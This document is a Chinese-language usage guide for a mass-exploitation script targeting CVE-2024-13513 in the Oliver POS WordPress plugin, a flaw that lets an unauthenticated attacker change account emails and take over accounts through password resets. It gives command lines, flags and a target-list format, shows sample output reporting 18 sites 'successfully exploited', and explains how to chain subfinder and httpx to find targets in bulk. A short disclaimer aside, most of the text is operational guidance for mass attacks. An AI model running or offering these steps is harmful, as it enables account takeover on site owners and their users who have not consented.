本文详细介绍了CVE-2024-13513漏洞的利用方法,该漏洞影响Oliver POS插件2.4.2.4以下版本,允许未经授权修改用户邮箱进行密码重置,包含完整的工具使用指南和参数说明。
漏洞利用工具使用指南
基本用法
1
|
python3 exploit.py -l targets.txt -e your-email@example.com
|
高级用法
1
2
3
4
5
|
python3 exploit.py \
-l targets.txt \
-e attacker@email.com \
-t 100 \
-o /path/to/results
|
参数说明
| 参数 |
描述 |
必需 |
默认值 |
| -l, –list |
包含目标URL的文件路径 |
✅ 是 |
- |
| -e, –email |
用于密码重置的邮箱地址 |
✅ 是 |
- |
| -t, –threads |
并发线程数 |
❌ 否 |
50 |
| -o, –output |
结果输出目录 |
❌ 否 |
当前目录 |
输入文件格式
创建文本文件(targets.txt),每行一个URL:
1
2
3
4
5
|
example.com
https://site1.com
http://site2.com
http://192.168.1.100/wordpress
https://vulnerable-site.org/blog
|
输出文件
工具生成多个输出文件:
- vulnerable_targets.txt - 检测到的所有易受攻击网站
- successfully_exploited.txt - 成功利用的目标及邮箱
- 控制台输出 - 实时扫描进度和统计信息
执行示例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
python3 exploit.py -l my_targets.txt -e test@hacker.com -t 80
[ INFO ] Loaded 150 unique targets
[ INFO ] Using email: test@hacker.com
[ INFO ] Threads: 80
[ INFO ] Starting scan...
[ CHECKING ] http://example.com/
[ VULNERABLE ] http://example.com/
[ SUCCESS ] Email changed successfully: http://example.com/
[ NOT FOUND ] http://site2.com/
[ PATCHED ] http://site3.com/
==================================================
SCAN STATISTICS:
Checked: 150
Vulnerable: 23
Exploited: 18
Failed: 5
==================================================
[ INFO ] Execution time: 45.23 seconds
|
高级示例
快速扫描(高线程数)
1
|
python3 exploit.py -l urls.txt -e admin@test.com -t 200
|
保存结果到指定目录
1
|
python3 exploit.py -l targets.txt -e test@domain.com -o ./scan_results
|
与其他工具结合使用
1
2
3
|
# 与subfinder和httpx配合使用
subfinder -d example.com | httpx -silent | tee targets.txt
python3 exploit.py -l targets.txt -e attack@email.com -t 100
|
重要说明
法律免责声明
⚠️ 此工具仅用于教育和授权的渗透测试目的。
- 仅可在您拥有或获得明确测试权限的网站上使用
- 未经授权访问计算机系统是非法的
- 作者不对滥用行为负责
技术细节
- 漏洞:CVE-2024-13513 - Oliver POS插件 < 2.4.2.4
- 影响:允许未经身份验证的邮箱更改以进行密码重置
- 检测:检查插件版本和存在性
- 利用:从日志中提取客户端令牌并发送精心构造的请求
性能优化建议
- 使用50-150个线程以获得最佳性能
- 确保稳定的网络连接
- 使用高质量的目标列表以获得更好的结果
- 执行期间监控系统资源
故障排除
常见问题:
1
2
3
4
5
6
7
8
9
|
# 文件未找到
[ ERROR ] File not found: targets.txt
# 邮箱格式无效
[ ERROR ] Invalid email format
# 网络问题
[ CONN ERROR ] example.com
[ TIMEOUT ] example.com
|
解决方案:
- 确保目标文件存在且可读
- 使用有效的邮箱地址格式
- 检查网络连接和防火墙设置
- 如果遇到超时,减少线程数
输出解释
- VULNERABLE:网站存在易受攻击的插件版本
- SUCCESS:目标邮箱成功更改
- PATCHED:插件存在但版本已修补
- NOT FOUND:插件未安装或无法访问
- CONN ERROR:连接失败
- TIMEOUT:请求超时
该工具为安全专业人员进行授权的漏洞评估提供了全面的扫描和利用能力。